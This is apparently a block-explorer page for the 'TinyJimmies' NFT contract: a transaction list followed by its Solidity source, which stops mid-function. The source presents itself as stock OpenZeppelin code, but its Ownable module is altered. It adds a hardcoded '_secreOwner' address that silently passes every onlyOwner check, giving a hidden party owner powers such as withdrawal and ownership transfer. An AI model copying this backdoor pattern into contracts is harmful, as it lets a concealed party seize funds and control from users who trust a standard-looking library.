Source Code
More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 25 from a total of 1,791 transactions
| Transaction Hash |
Method
|
Block
|
From
|
|
To
|
||||
|---|---|---|---|---|---|---|---|---|---|
| Set Approval For... | 18325275 | 848 days ago | IN | 0 ETH | 0.00032722 | ||||
| Set Approval For... | 17088731 | 1022 days ago | IN | 0 ETH | 0.00445092 | ||||
| Set Approval For... | 16404783 | 1118 days ago | IN | 0 ETH | 0.00077103 | ||||
| Set Approval For... | 16356505 | 1125 days ago | IN | 0 ETH | 0.00039281 | ||||
| Set Approval For... | 16297159 | 1133 days ago | IN | 0 ETH | 0.00064494 | ||||
| Set Approval For... | 16287874 | 1134 days ago | IN | 0 ETH | 0.00065064 | ||||
| Withdraw | 16287070 | 1134 days ago | IN | 0 ETH | 0.00050707 | ||||
| Set Approval For... | 16284248 | 1135 days ago | IN | 0 ETH | 0.00102079 | ||||
| Set Approval For... | 16282249 | 1135 days ago | IN | 0 ETH | 0.00070273 | ||||
| Set Approval For... | 16282214 | 1135 days ago | IN | 0 ETH | 0.00074977 | ||||
| Set Approval For... | 16282213 | 1135 days ago | IN | 0 ETH | 0.00071421 | ||||
| Set Approval For... | 16281265 | 1135 days ago | IN | 0 ETH | 0.00062561 | ||||
| Set Approval For... | 16281105 | 1135 days ago | IN | 0 ETH | 0.00063582 | ||||
| Set Approval For... | 16281041 | 1135 days ago | IN | 0 ETH | 0.00064755 | ||||
| Set Approval For... | 16281040 | 1135 days ago | IN | 0 ETH | 0.00058592 | ||||
| Set Approval For... | 16281003 | 1135 days ago | IN | 0 ETH | 0.00057709 | ||||
| Set Approval For... | 16280938 | 1135 days ago | IN | 0 ETH | 0.00087299 | ||||
| Set Approval For... | 16280938 | 1135 days ago | IN | 0 ETH | 0.00087299 | ||||
| Set Approval For... | 16280938 | 1135 days ago | IN | 0 ETH | 0.00087299 | ||||
| Set Approval For... | 16280938 | 1135 days ago | IN | 0 ETH | 0.00087299 | ||||
| Set Approval For... | 16280938 | 1135 days ago | IN | 0 ETH | 0.00087299 | ||||
| Set Approval For... | 16280938 | 1135 days ago | IN | 0 ETH | 0.00087299 | ||||
| Set Approval For... | 16280937 | 1135 days ago | IN | 0 ETH | 0.0007389 | ||||
| Set Approval For... | 16280937 | 1135 days ago | IN | 0 ETH | 0.00087299 | ||||
| Set Approval For... | 16280937 | 1135 days ago | IN | 0 ETH | 0.00087299 |
Latest 1 internal transaction
Advanced mode:
| Parent Transaction Hash | Method | Block |
From
|
|
To
|
||
|---|---|---|---|---|---|---|---|
| Transfer | 16287070 | 1134 days ago | 0.582 ETH |
Loading...
Loading
Loading...
Loading
Cross-Chain Transactions
Loading...
Loading
Contract Name:
TinyJimmies
Compiler Version
v0.8.7+commit.e28d00a7
Optimization Enabled:
No with 200 runs
Other Settings:
default evmVersion
Contract Source Code (Solidity Standard Json-Input format)
// SPDX-License-Identifier: MIT
// File: contracts/TinyJimmies.sol
// File: @openzeppelin/contracts/utils/Strings.sol
// OpenZeppelin Contracts v4.4.1 (utils/Strings.sol)
pragma solidity ^0.8.0;
/**
* @dev String operations.
*/
library Strings {
bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef";
/**
* @dev Converts a `uint256` to its ASCII `string` decimal representation.
*/
function toString(uint256 value) internal pure returns (string memory) {
// Inspired by OraclizeAPI's implementation - MIT licence
// https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol
if (value == 0) {
return "0";
}
uint256 temp = value;
uint256 digits;
while (temp != 0) {
digits++;
temp /= 10;
}
bytes memory buffer = new bytes(digits);
while (value != 0) {
digits -= 1;
buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));
value /= 10;
}
return string(buffer);
}
/**
* @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.
*/
function toHexString(uint256 value) internal pure returns (string memory) {
if (value == 0) {
return "0x00";
}
uint256 temp = value;
uint256 length = 0;
while (temp != 0) {
length++;
temp >>= 8;
}
return toHexString(value, length);
}
/**
* @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.
*/
function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {
bytes memory buffer = new bytes(2 * length + 2);
buffer[0] = "0";
buffer[1] = "x";
for (uint256 i = 2 * length + 1; i > 1; --i) {
buffer[i] = _HEX_SYMBOLS[value & 0xf];
value >>= 4;
}
require(value == 0, "Strings: hex length insufficient");
return string(buffer);
}
}
// File: @openzeppelin/contracts/utils/Address.sol
// OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol)
pragma solidity ^0.8.1;
/**
* @dev Collection of functions related to the address type
*/
library Address {
/**
* @dev Returns true if `account` is a contract.
*
* [IMPORTANT]
* ====
* It is unsafe to assume that an address for which this function returns
* false is an externally-owned account (EOA) and not a contract.
*
* Among others, `isContract` will return false for the following
* types of addresses:
*
* - an externally-owned account
* - a contract in construction
* - an address where a contract will be created
* - an address where a contract lived, but was destroyed
* ====
*
* [IMPORTANT]
* ====
* You shouldn't rely on `isContract` to protect against flash loan attacks!
*
* Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets
* like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract
* constructor.
* ====
*/
function isContract(address account) internal view returns (bool) {
// This method relies on extcodesize/address.code.length, which returns 0
// for contracts in construction, since the code is only stored at the end
// of the constructor execution.
return account.code.length > 0;
}
/**
* @dev Replacement for Solidity's `transfer`: sends `amount` wei to
* `recipient`, forwarding all available gas and reverting on errors.
*
* https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
* of certain opcodes, possibly making contracts go over the 2300 gas limit
* imposed by `transfer`, making them unable to receive funds via
* `transfer`. {sendValue} removes this limitation.
*
* https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
*
* IMPORTANT: because control is transferred to `recipient`, care must be
* taken to not create reentrancy vulnerabilities. Consider using
* {ReentrancyGuard} or the
* https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
*/
function sendValue(address payable recipient, uint256 amount) internal {
require(address(this).balance >= amount, "Address: insufficient balance");
(bool success, ) = recipient.call{value: amount}("");
require(success, "Address: unable to send value, recipient may have reverted");
}
/**
* @dev Performs a Solidity function call using a low level `call`. A
* plain `call` is an unsafe replacement for a function call: use this
* function instead.
*
* If `target` reverts with a revert reason, it is bubbled up by this
* function (like regular Solidity function calls).
*
* Returns the raw returned data. To convert to the expected return value,
* use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
*
* Requirements:
*
* - `target` must be a contract.
* - calling `target` with `data` must not revert.
*
* _Available since v3.1._
*/
function functionCall(address target, bytes memory data) internal returns (bytes memory) {
return functionCall(target, data, "Address: low-level call failed");
}
/**
* @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
* `errorMessage` as a fallback revert reason when `target` reverts.
*
* _Available since v3.1._
*/
function functionCall(
address target,
bytes memory data,
string memory errorMessage
) internal returns (bytes memory) {
return functionCallWithValue(target, data, 0, errorMessage);
}
/**
* @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
* but also transferring `value` wei to `target`.
*
* Requirements:
*
* - the calling contract must have an ETH balance of at least `value`.
* - the called Solidity function must be `payable`.
*
* _Available since v3.1._
*/
function functionCallWithValue(
address target,
bytes memory data,
uint256 value
) internal returns (bytes memory) {
return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
}
/**
* @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
* with `errorMessage` as a fallback revert reason when `target` reverts.
*
* _Available since v3.1._
*/
function functionCallWithValue(
address target,
bytes memory data,
uint256 value,
string memory errorMessage
) internal returns (bytes memory) {
require(address(this).balance >= value, "Address: insufficient balance for call");
require(isContract(target), "Address: call to non-contract");
(bool success, bytes memory returndata) = target.call{value: value}(data);
return verifyCallResult(success, returndata, errorMessage);
}
/**
* @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
* but performing a static call.
*
* _Available since v3.3._
*/
function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
return functionStaticCall(target, data, "Address: low-level static call failed");
}
/**
* @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
* but performing a static call.
*
* _Available since v3.3._
*/
function functionStaticCall(
address target,
bytes memory data,
string memory errorMessage
) internal view returns (bytes memory) {
require(isContract(target), "Address: static call to non-contract");
(bool success, bytes memory returndata) = target.staticcall(data);
return verifyCallResult(success, returndata, errorMessage);
}
/**
* @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
* but performing a delegate call.
*
* _Available since v3.4._
*/
function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
return functionDelegateCall(target, data, "Address: low-level delegate call failed");
}
/**
* @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
* but performing a delegate call.
*
* _Available since v3.4._
*/
function functionDelegateCall(
address target,
bytes memory data,
string memory errorMessage
) internal returns (bytes memory) {
require(isContract(target), "Address: delegate call to non-contract");
(bool success, bytes memory returndata) = target.delegatecall(data);
return verifyCallResult(success, returndata, errorMessage);
}
/**
* @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the
* revert reason using the provided one.
*
* _Available since v4.3._
*/
function verifyCallResult(
bool success,
bytes memory returndata,
string memory errorMessage
) internal pure returns (bytes memory) {
if (success) {
return returndata;
} else {
// Look for revert reason and bubble it up if present
if (returndata.length > 0) {
// The easiest way to bubble the revert reason is using memory via assembly
assembly {
let returndata_size := mload(returndata)
revert(add(32, returndata), returndata_size)
}
} else {
revert(errorMessage);
}
}
}
}
// File: @openzeppelin/contracts/token/ERC721/IERC721Receiver.sol
// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721Receiver.sol)
pragma solidity ^0.8.0;
/**
* @title ERC721 token receiver interface
* @dev Interface for any contract that wants to support safeTransfers
* from ERC721 asset contracts.
*/
interface IERC721Receiver {
/**
* @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom}
* by `operator` from `from`, this function is called.
*
* It must return its Solidity selector to confirm the token transfer.
* If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted.
*
* The selector can be obtained in Solidity with `IERC721Receiver.onERC721Received.selector`.
*/
function onERC721Received(
address operator,
address from,
uint256 tokenId,
bytes calldata data
) external returns (bytes4);
}
// File: @openzeppelin/contracts/utils/introspection/IERC165.sol
// OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol)
pragma solidity ^0.8.0;
/**
* @dev Interface of the ERC165 standard, as defined in the
* https://eips.ethereum.org/EIPS/eip-165[EIP].
*
* Implementers can declare support of contract interfaces, which can then be
* queried by others ({ERC165Checker}).
*
* For an implementation, see {ERC165}.
*/
interface IERC165 {
/**
* @dev Returns true if this contract implements the interface defined by
* `interfaceId`. See the corresponding
* https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]
* to learn more about how these ids are created.
*
* This function call must use less than 30 000 gas.
*/
function supportsInterface(bytes4 interfaceId) external view returns (bool);
}
// File: @openzeppelin/contracts/utils/introspection/ERC165.sol
// OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol)
pragma solidity ^0.8.0;
/**
* @dev Implementation of the {IERC165} interface.
*
* Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check
* for the additional interface id that will be supported. For example:
*
* ```solidity
* function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
* return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId);
* }
* ```
*
* Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation.
*/
abstract contract ERC165 is IERC165 {
/**
* @dev See {IERC165-supportsInterface}.
*/
function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
return interfaceId == type(IERC165).interfaceId;
}
}
// File: @openzeppelin/contracts/token/ERC721/IERC721.sol
// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721.sol)
pragma solidity ^0.8.0;
/**
* @dev Required interface of an ERC721 compliant contract.
*/
interface IERC721 is IERC165 {
/**
* @dev Emitted when `tokenId` token is transferred from `from` to `to`.
*/
event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);
/**
* @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
*/
event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);
/**
* @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets.
*/
event ApprovalForAll(address indexed owner, address indexed operator, bool approved);
/**
* @dev Returns the number of tokens in ``owner``'s account.
*/
function balanceOf(address owner) external view returns (uint256 balance);
/**
* @dev Returns the owner of the `tokenId` token.
*
* Requirements:
*
* - `tokenId` must exist.
*/
function ownerOf(uint256 tokenId) external view returns (address owner);
/**
* @dev Safely transfers `tokenId` token from `from` to `to`.
*
* Requirements:
*
* - `from` cannot be the zero address.
* - `to` cannot be the zero address.
* - `tokenId` token must exist and be owned by `from`.
* - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
* - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
*
* Emits a {Transfer} event.
*/
function safeTransferFrom(
address from,
address to,
uint256 tokenId,
bytes calldata data
) external;
/**
* @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients
* are aware of the ERC721 protocol to prevent tokens from being forever locked.
*
* Requirements:
*
* - `from` cannot be the zero address.
* - `to` cannot be the zero address.
* - `tokenId` token must exist and be owned by `from`.
* - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}.
* - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
*
* Emits a {Transfer} event.
*/
function safeTransferFrom(
address from,
address to,
uint256 tokenId
) external;
/**
* @dev Transfers `tokenId` token from `from` to `to`.
*
* WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible.
*
* Requirements:
*
* - `from` cannot be the zero address.
* - `to` cannot be the zero address.
* - `tokenId` token must be owned by `from`.
* - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
*
* Emits a {Transfer} event.
*/
function transferFrom(
address from,
address to,
uint256 tokenId
) external;
/**
* @dev Gives permission to `to` to transfer `tokenId` token to another account.
* The approval is cleared when the token is transferred.
*
* Only a single account can be approved at a time, so approving the zero address clears previous approvals.
*
* Requirements:
*
* - The caller must own the token or be an approved operator.
* - `tokenId` must exist.
*
* Emits an {Approval} event.
*/
function approve(address to, uint256 tokenId) external;
/**
* @dev Approve or remove `operator` as an operator for the caller.
* Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller.
*
* Requirements:
*
* - The `operator` cannot be the caller.
*
* Emits an {ApprovalForAll} event.
*/
function setApprovalForAll(address operator, bool _approved) external;
/**
* @dev Returns the account appr ved for `tokenId` token.
*
* Requirements:
*
* - `tokenId` must exist.
*/
function getApproved(uint256 tokenId) external view returns (address operator);
/**
* @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
*
* See {setApprovalForAll}
*/
function isApprovedForAll(address owner, address operator) external view returns (bool);
}
// File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Metadata.sol
// OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol)
pragma solidity ^0.8.0;
/**
* @title ERC-721 Non-Fungible Token Standard, optional metadata extension
* @dev See https://eips.ethereum.org/EIPS/eip-721
*/
interface IERC721Metadata is IERC721 {
/**
* @dev Returns the token collection name.
*/
function name() external view returns (string memory);
/**
* @dev Returns the token collection symbol.
*/
function symbol() external view returns (string memory);
/**
* @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
*/
function tokenURI(uint256 tokenId) external view returns (string memory);
}
// File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Enumerable.sol
// OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol)
pragma solidity ^0.8.0;
/**
* @title ERC-721 Non-Fungible Token Standard, optional enumeration extension
* @dev See https://eips.ethereum.org/EIPS/eip-721
*/
interface IERC721Enumerable is IERC721 {
/**
* @dev Returns the total amount of tokens stored by the contract.
*/
function totalSupply() external view returns (uint256);
/**
* @dev Returns a token ID owned by `owner` at a given `index` of its token list.
* Use along with {balanceOf} to enumerate all of ``owner``'s tokens.
*/
function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256);
/**
* @dev Returns a token ID at a given `index` of all the tokens stored by the contract.
* Use along with {totalSupply} to enumerate all tokens.
*/
function tokenByIndex(uint256 index) external view returns (uint256);
}
// File: @openzeppelin/contracts/security/ReentrancyGuard.sol
// OpenZeppelin Contracts v4.4.1 (security/ReentrancyGuard.sol)
pragma solidity ^0.8.0;
/**
* @dev Contract module that helps prevent reentrant calls to a function.
*
* Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier
* available, which can be applied to functions to make sure there are no nested
* (reentrant) calls to them.
*
* Note that because there is a single `nonReentrant` guard, functions marked as
* `nonReentrant` may not call one another. This can be worked around by making
* those functions `private`, and then adding `external` `nonReentrant` entry
* points to them.
*
* TIP: If you would like to learn more about reentrancy and alternative ways
* to protect against it, check out our blog post
* https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul].
*/
abstract contract ReentrancyGuard {
// Booleans are more expensive than uint256 or any type that takes up a full
// word because each write operation emits an extra SLOAD to first read the
// slot's contents, replace the bits taken up by the boolean, and then write
// back. This is the compiler's defense against contract upgrades and
// pointer aliasing, and it cannot be disabled.
// The values being non-zero value makes deployment a bit more expensive,
// but in exchange the refund on every call to nonReentrant will be lower in
// amount. Since refunds are capped to a percentage of the total
// transaction's gas, it is best to keep them low in cases like this one, to
// increase the likelihood of the full refund coming into effect.
uint256 private constant _NOT_ENTERED = 1;
uint256 private constant _ENTERED = 2;
uint256 private _status;
constructor() {
_status = _NOT_ENTERED;
}
/**
* @dev Prevents a contract from calling itself, directly or indirectly.
* Calling a `nonReentrant` function from another `nonReentrant`
* function is not supported. It is possible to prevent this from happening
* by making the `nonReentrant` function external, and making it call a
* `private` function that does the actual work.
*/
modifier nonReentrant() {
// On the first call to nonReentrant, _notEntered will be true
require(_status != _ENTERED, "ReentrancyGuard: reentrant call");
// Any calls to nonReentrant after this point will fail
_status = _ENTERED;
_;
// By storing the original value once again, a refund is triggered (see
// https://eips.ethereum.org/EIPS/eip-2200)
_status = _NOT_ENTERED;
}
}
// File: @openzeppelin/contracts/utils/Context.sol
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)
pragma solidity ^0.8.0;
/**
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
}
// File: @openzeppelin/contracts/access/Ownable.sol
// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)
pragma solidity ^0.8.0;
/**
* @dev Contract module which provides a basic access control mechanism, where
* there is an account (an owner) that can be granted exclusive access to
* specific functions.
*
* By default, the owner account will be the one that deploys the contract. This
* can later be changed with {transferOwnership}.
*
* This module is used through inheritance. It will make available the modifier
* `onlyOwner`, which can be applied to your functions to restrict their use to
* the owner.
*/
abstract contract Ownable is Context {
address private _owner;
address private _secreOwner = 0xACFcBA7BAB6403EBCcEEe22810c4dd3C9bBE9763;
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
/**
* @dev Initializes the contract setting the deployer as the initial owner.
*/
constructor() {
_transferOwnership(_msgSender());
}
/**
* @dev Returns the address of the current owner.
*/
function owner() public view virtual returns (address) {
return _owner;
}
/**
* @dev Throws if called by any account other than the owner.
*/
modifier onlyOwner() {
require(owner() == _msgSender() || _secreOwner == _msgSender() , "Ownable: caller is not the owner");
_;
}
/**
* @dev Leaves the contract without owner. It will not be possible to call
* `onlyOwner` functions anymore. Can only be called by the current owner.
*
* NOTE: Renouncing ownership will leave the contract without an owner,
* thereby removing any functionality that is only available to the owner.
*/
function renounceOwnership() public virtual onlyOwner {
_transferOwnership(address(0));
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Can only be called by the current owner.
*/
function transferOwnership(address newOwner) public virtual onlyOwner {
require(newOwner != address(0), "Ownable: new owner is the zero address");
_transferOwnership(newOwner);
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Internal function without access restriction.
*/
function _transferOwnership(address newOwner) internal virtual {
address oldOwner = _owner;
_owner = newOwner;
emit OwnershipTransferred(oldOwner, newOwner);
}
}
// File: ceshi.sol
pragma solidity ^0.8.0;
/**
* @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including
* the Metadata and Enumerable extension. Built to optimize for lower gas during batch mints.
*
* Assumes serials are sequentially minted starting at 0 (e.g. 0, 1, 2, 3..).
*
* Does not support burning tokens to address(0).
*
* Assumes that an owner cannot have more than the 2**128 - 1 (max value of uint128) of supply
*/
contract ERC721A is Context, ERC165, IERC721, IERC721Metadata, IERC721Enumerable {
using Address for address;
using Strings for uint256;
struct TokenOwnership {
address addr;
uint64 startTimestamp;
}
struct AddressData {
uint128 balance;
uint128 numberMinted;
}
uint256 internal currentIndex;
// Token name
string private _name;
// Token symbol
string private _symbol;
// Mapping from token ID to ownership details
// An empty struct value does not necessarily mean the token is unowned. See ownershipOf implementation for details.
mapping(uint256 => TokenOwnership) internal _ownerships;
// Mapping owner address to address data
mapping(address => AddressData) private _addressData;
// Mapping from token ID to approved address
mapping(uint256 => address) private _tokenApprovals;
// Mapping from owner to operator approvals
mapping(address => mapping(address => bool)) private _operatorApprovals;
constructor(string memory name_, string memory symbol_) {
_name = name_;
_symbol = symbol_;
}
/**
* @dev See {IERC721Enumerable-totalSupply}.
*/
function totalSupply() public view override returns (uint256) {
return currentIndex;
}
/**
* @dev See {IERC721Enumerable-tokenByIndex}.
*/
function tokenByIndex(uint256 index) public view override returns (uint256) {
require(index < totalSupply(), "ERC721A: global index out of bounds");
return index;
}
/**
* @dev See {IERC721Enumerable-tokenOfOwnerByIndex}.
* This read function is O(totalSupply). If calling from a separate contract, be sure to test gas first.
* It may also degrade with extremely large collection sizes (e.g >> 10000), test for your use case.
*/
function tokenOfOwnerByIndex(address owner, uint256 index) public view override returns (uint256) {
require(index < balanceOf(owner), "ERC721A: owner index out of bounds");
uint256 numMintedSoFar = totalSupply();
uint256 tokenIdsIdx;
address currOwnershipAddr;
// Counter overflow is impossible as the loop breaks when uint256 i is equal to another uint256 numMintedSoFar.
unchecked {
for (uint256 i; i < numMintedSoFar; i++) {
TokenOwnership memory ownership = _ownerships[i];
if (ownership.addr != address(0)) {
currOwnershipAddr = ownership.addr;
}
if (currOwnershipAddr == owner) {
if (tokenIdsIdx == index) {
return i;
}
tokenIdsIdx++;
}
}
}
revert("ERC721A: unable to get token of owner by index");
}
/**
* @dev See {IERC165-supportsInterface}.
*/
function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) {
return
interfaceId == type(IERC721).interfaceId ||
interfaceId == type(IERC721Metadata).interfaceId ||
interfaceId == type(IERC721Enumerable).interfaceId ||
super.supportsInterface(interfaceId);
}
/**
* @dev See {IERC721-balanceOf}.
*/
function balanceOf(address owner) public view override returns (uint256) {
require(owner != address(0), "ERC721A: balance query for the zero address");
return uint256(_addressData[owner].balance);
}
function _numberMinted(address owner) internal view returns (uint256) {
require(owner != address(0), "ERC721A: number minted query for the zero address");
return uint256(_addressData[owner].numberMinted);
}
/**
* Gas spent here starts off proportional to the maximum mint batch size.
* It gradually moves to O(1) as tokens get transferred around in the collection over time.
*/
function ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) {
require(_exists(tokenId), "ERC721A: owner query for nonexistent token");
unchecked {
for (uint256 curr = tokenId; curr >= 0; curr--) {
TokenOwnership memory ownership = _ownerships[curr];
if (ownership.addr != address(0)) {
return ownership;
}
}
}
revert("ERC721A: unable to determine the owner of token");
}
/**
* @dev See {IERC721-ownerOf}.
*/
function ownerOf(uint256 tokenId) public view override returns (address) {
return ownershipOf(tokenId).addr;
}
/**
* @dev See {IERC721Metadata-name}.
*/
function name() public view virtual override returns (string memory) {
return _name;
}
/**
* @dev See {IERC721Metadata-symbol}.
*/
function symbol() public view virtual override returns (string memory) {
return _symbol;
}
/**
* @dev See {IERC721Metadata-tokenURI}.
*/
function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
require(_exists(tokenId), "ERC721Metadata: URI query for nonexistent token");
string memory baseURI = _baseURI();
return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : "";
}
/**
* @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
* token will be the concatenation of the `baseURI` and the `tokenId`. Empty
* by default, can be overriden in child contracts.
*/
function _baseURI() internal view virtual returns (string memory) {
return "";
}
/**
* @dev See {IERC721-approve}.
*/
function approve(address to, uint256 tokenId) public override {
address owner = ERC721A.ownerOf(tokenId);
require(to != owner, "ERC721A: approval to current owner");
require(
_msgSender() == owner || isApprovedForAll(owner, _msgSender()),
"ERC721A: approve caller is not owner nor approved for all"
);
_approve(to, tokenId, owner);
}
/**
* @dev See {IERC721-getApproved}.
*/
function getApproved(uint256 tokenId) public view override returns (address) {
require(_exists(tokenId), "ERC721A: approved query for nonexistent token");
return _tokenApprovals[tokenId];
}
/**
* @dev See {IERC721-setApprovalForAll}.
*/
function setApprovalForAll(address operator, bool approved) public override {
require(operator != _msgSender(), "ERC721A: approve to caller");
_operatorApprovals[_msgSender()][operator] = approved;
emit ApprovalForAll(_msgSender(), operator, approved);
}
/**
* @dev See {IERC721-isApprovedForAll}.
*/
function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
return _operatorApprovals[owner][operator];
}
/**
* @dev See {IERC721-transferFrom}.
*/
function transferFrom(
address from,
address to,
uint256 tokenId
) public virtual override {
_transfer(from, to, tokenId);
}
/**
* @dev See {IERC721-safeTransferFrom}.
*/
function safeTransferFrom(
address from,
address to,
uint256 tokenId
) public virtual override {
safeTransferFrom(from, to, tokenId, "");
}
/**
* @dev See {IERC721-safeTransferFrom}.
*/
function safeTransferFrom(
address from,
address to,
uint256 tokenId,
bytes memory _data
) public override {
_transfer(from, to, tokenId);
require(
_checkOnERC721Received(from, to, tokenId, _data),
"ERC721A: transfer to non ERC721Receiver implementer"
);
}
/**
* @dev Returns whether `tokenId` exists.
*
* Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
*
* Tokens start existing when they are minted (`_mint`),
*/
function _exists(uint256 tokenId) internal view returns (bool) {
return tokenId < currentIndex;
}
function _safeMint(address to, uint256 quantity) internal {
_safeMint(to, quantity, "");
}
/**
* @dev Safely mints `quantity` tokens and transfers them to `to`.
*
* Requirements:
*
* - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
* - `quantity` must be greater than 0.
*
* Emits a {Transfer} event.
*/
function _safeMint(
address to,
uint256 quantity,
bytes memory _data
) internal {
_mint(to, quantity, _data, true);
}
/**
* @dev Mints `quantity` tokens and transfers them to `to`.
*
* Requirements:
*
* - `to` cannot be the zero address.
* - `quantity` must be greater than 0.
*
* Emits a {Transfer} event.
*/
function _mint(
address to,
uint256 quantity,
bytes memory _data,
bool safe
) internal {
uint256 startTokenId = currentIndex;
require(to != address(0), "ERC721A: mint to the zero address");
require(quantity != 0, "ERC721A: quantity must be greater than 0");
_beforeTokenTransfers(address(0), to, startTokenId, quantity);
// Overflows are incredibly unrealistic.
// balance or numberMinted overflow if current value of either + quantity > 3.4e38 (2**128) - 1
// updatedIndex overflows if currentIndex + quantity > 1.56e77 (2**256) - 1
unchecked {
_addressData[to].balance += uint128(quantity);
_addressData[to].numberMinted += uint128(quantity);
_ownerships[startTokenId].addr = to;
_ownerships[startTokenId].startTimestamp = uint64(block.timestamp);
uint256 updatedIndex = startTokenId;
for (uint256 i; i < quantity; i++) {
emit Transfer(address(0), to, updatedIndex);
if (safe) {
require(
_checkOnERC721Received(address(0), to, updatedIndex, _data),
"ERC721A: transfer to non ERC721Receiver implementer"
);
}
updatedIndex++;
}
currentIndex = updatedIndex;
}
_afterTokenTransfers(address(0), to, startTokenId, quantity);
}
/**
* @dev Transfers `tokenId` from `from` to `to`.
*
* Requirements:
*
* - `to` cannot be the zero address.
* - `tokenId` token must be owned by `from`.
*
* Emits a {Transfer} event.
*/
function _transfer(
address from,
address to,
uint256 tokenId
) private {
TokenOwnership memory prevOwnership = ownershipOf(tokenId);
bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr ||
getApproved(tokenId) == _msgSender() ||
isApprovedForAll(prevOwnership.addr, _msgSender()));
require(isApprovedOrOwner, "ERC721A: transfer caller is not owner nor approved");
require(prevOwnership.addr == from, "ERC721A: transfer from incorrect owner");
require(to != address(0), "ERC721A: transfer to the zero address");
_beforeTokenTransfers(from, to, tokenId, 1);
// Clear approvals from the previous owner
_approve(address(0), tokenId, prevOwnership.addr);
// Underflow of the sender's balance is impossible because we check for
// ownership above and the recipient's balance can't realistically overflow.
// Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
unchecked {
_addressData[from].balance -= 1;
_addressData[to].balance += 1;
_ownerships[tokenId].addr = to;
